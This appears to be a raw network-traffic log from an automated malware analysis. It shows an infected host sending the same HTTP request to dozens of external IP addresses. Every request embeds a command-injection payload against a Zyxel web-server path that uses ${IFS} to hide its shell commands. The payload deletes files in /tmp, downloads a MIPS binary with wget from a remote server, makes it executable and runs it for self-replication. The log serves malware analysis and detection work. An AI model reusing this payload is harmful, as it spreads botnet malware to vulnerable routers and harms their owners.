                                          Jan 14, 2024 15:46:22.114993095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5772192.168.2.2341342158.168.108.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115022898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5773192.168.2.235756479.191.18.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115056038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5774192.168.2.2360710186.218.94.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115084887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5775192.168.2.2349552107.35.164.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115106106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5776192.168.2.2346388192.127.67.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115113974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5777192.168.2.2348160207.200.5.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115147114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5778192.168.2.2358956152.16.39.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115173101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5779192.168.2.2346740172.80.226.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115206957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5780192.168.2.2339868142.172.14.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115230083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5781192.168.2.233816054.242.76.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115264893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5782192.168.2.2342158117.203.141.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115303040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5783192.168.2.2339414110.10.52.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115329027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5784192.168.2.2349416152.158.82.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115358114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5785192.168.2.233440495.27.243.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115417957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5786192.168.2.234471871.5.119.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115438938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5787192.168.2.235625083.187.182.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115459919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5788192.168.2.234090293.211.31.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115502119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5789192.168.2.2338582123.131.88.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115528107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5790192.168.2.2340000141.29.23.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115561008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5791192.168.2.234110052.32.156.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115586042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5792192.168.2.235679831.107.65.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115608931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5793192.168.2.234233484.222.227.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115644932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5794192.168.2.2341070118.167.196.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115658998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5795192.168.2.2357834107.83.48.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115690947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5796192.168.2.233513617.127.184.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115719080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5797192.168.2.2347072165.239.175.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115732908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5798192.168.2.233790044.91.78.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115746021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5799192.168.2.233934497.195.75.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115782022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5800192.168.2.2347010139.25.245.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115814924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5801192.168.2.235224661.39.238.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115844011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5802192.168.2.235390477.28.2.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115869999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5803192.168.2.2346352184.73.239.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115906954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5804192.168.2.2358870130.9.221.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115915060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5805192.168.2.2337896161.99.178.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115947008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5806192.168.2.234039068.118.37.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.115982056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5807192.168.2.2339302165.79.174.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116007090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5808192.168.2.2334118223.94.112.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116010904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5809192.168.2.2354050155.55.28.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116065979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5810192.168.2.2353266170.49.165.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116173983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5811192.168.2.2341844177.179.30.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116204023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5812192.168.2.2345416106.116.37.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116224051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5813192.168.2.2334258191.134.140.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116250992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5814192.168.2.233775683.40.242.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116277933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5815192.168.2.2350552122.24.49.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116308928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5816192.168.2.2344760139.85.131.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116328955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5817192.168.2.235154212.44.153.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116352081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5818192.168.2.235304036.87.65.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116393089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5819192.168.2.233710049.129.130.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116419077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5820192.168.2.2353294205.198.202.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116427898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5821192.168.2.235898477.234.77.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116466045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5822192.168.2.2347562120.172.22.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116496086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5823192.168.2.2345520150.215.252.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116503954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5824192.168.2.2334870129.32.12.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116525888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5825192.168.2.2335310204.20.111.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116563082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5826192.168.2.233828649.217.128.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116602898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5827192.168.2.2348502125.134.16.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116633892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5828192.168.2.235621646.45.79.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116674900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5829192.168.2.233523053.53.101.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116677046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5830192.168.2.2352160122.109.20.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116720915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5831192.168.2.2339080133.194.153.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116758108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5832192.168.2.234562442.238.194.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116759062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5833192.168.2.235138432.18.59.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.116780996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5834192.168.2.2343834144.212.60.93443
                                          TimestampBytes transferredDirectionData
